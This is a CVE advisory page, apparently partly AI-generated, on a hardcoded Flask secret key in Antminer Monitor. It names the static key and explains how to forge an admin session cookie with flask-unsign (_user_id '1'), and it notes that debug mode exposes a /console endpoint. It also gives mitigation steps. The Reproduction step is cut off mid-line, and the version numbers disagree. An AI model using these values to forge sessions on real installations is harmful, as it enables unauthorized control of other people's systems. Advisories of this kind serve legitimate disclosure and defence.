CVE-2021-40903
Description
A vulnerability in Antminer Monitor 0.50.0 exists because of backdoor or misconfiguration inside a settings file in flask server. Settings file has a predefined secret string, which would be randomly generated, however it is static.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Antminer Monitor 0.50.0 uses a hardcoded Flask secret key in settings.py, allowing an attacker to forge session cookies and bypass authentication.
Vulnerability
Antminer Monitor version 0.50.0 contains a hardcoded Flask secret key in the settings.py configuration file. Instead of using a randomly generated secret, the developer left the static string 'super secret key' in the production build. This flaw exists in the Flask server's session signing mechanism, which is used to authenticate user sessions. The vulnerable code path is reachable by any user who can access the web interface, requiring no special configuration to trigger. The affected version is 0.50.0 as described in the references [1] [3].
Exploitation
An attacker needs only network access to the Antminer Monitor web interface. No authentication is required initially. The attacker uses the Flask session signing tool flask-unsign to forge a valid session cookie by signing it with the known secret key. The exploit generates a cookie that sets _user_id to '1' (admin). This forged session cookie is then presented to the web server in the session field, granting the attacker admin-level access without valid credentials. The steps are demonstrated in the exploit published on Exploit-DB and Packet Storm [1] [3].
Impact
Successful exploitation results in authentication bypass, granting the attacker full administrative privileges on the Antminer Monitor web interface. With admin access, the attacker can view and modify all monitored miners, including configuration data, hashrate, temperatures, and other sensitive system information. The impact is a complete compromise of confidentiality (information disclosure) and integrity (potential unauthorized configuration changes). The attacker gains the highest privilege level available in the application, effectively controlling the monitoring dashboard and the connected miner fleet.
Mitigation
As of the available references, no patched version has been released [1] [3]. The developer must regenerate the Flask secret key randomly for each deployment and ensure that settings.py does not contain hardcoded secrets. Users are advised to update the secret key themselves after installation by modifying the SECRET_KEY variable in settings.py to a long, random value and restarting the Flask server. Until a vendor fix arrives, all installations running version 0.50.0 remain vulnerable. The CVE is not listed in CISA's Known Exploited Vulnerabilities (KEV) catalog as of the publication date.
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- Antminer Monitor/Antminer Monitordescription
- Range: =0.50.0
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"The Flask secret key is hardcoded to a static value ('super secret key') in config/settings.py instead of being randomly generated per installation, allowing session cookie forgery."
Attack vector
An attacker can forge a valid Flask session cookie because the secret key is hardcoded to `'super secret key'` [ref_id=2]. Using the tool `flask-unsign`, the attacker signs a cookie containing `_user_id: '1'` and `_fresh: True`, which grants admin-level access to the web interface [ref_id=2]. The attacker only needs network access to the Antminer Monitor web server (commonly exposed on port 5000) and can then bypass the login page entirely. The same forged cookie works on every installation because the secret is identical across all deployments [ref_id=2].
Affected code
The vulnerability is in the Flask configuration file `config/settings.py` (at commit `5c62e1064af30674bacb9e1917d5980efbde1fcd`). The file defines a static secret key `'super secret key'` instead of a randomly generated value [ref_id=2]. Additionally, `DEBUG = True` is set, enabling the `/console` endpoint [ref_id=2].
What the fix does
No patch is provided in the bundle. The advisory [ref_id=2] identifies the root cause as a static secret key in `config/settings.py` that should have been randomly generated per installation. The remediation is to replace the hardcoded `'super secret key'` with a cryptographically random value generated at deployment time, and to set `DEBUG = False` in production to disable the `/console` endpoint. Without these changes, any attacker who knows the public secret can forge session cookies and gain admin access.
Preconditions
- networkThe Antminer Monitor web interface must be network-accessible to the attacker (e.g., exposed on port 5000).
- authNo authentication is required before exploitation; the attacker forges a session cookie directly.
Reproduction
1. Identify a target running Antminer Monitor 0.5.0 on `http://
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
2- packetstormsecurity.com/files/164048/Antminer-Monitor-0.5.0-Authentication-Bypass.htmlmitrex_refsource_MISC
- www.exploit-db.com/exploits/50267mitrex_refsource_MISC
News mentions
0No linked articles in our index yet.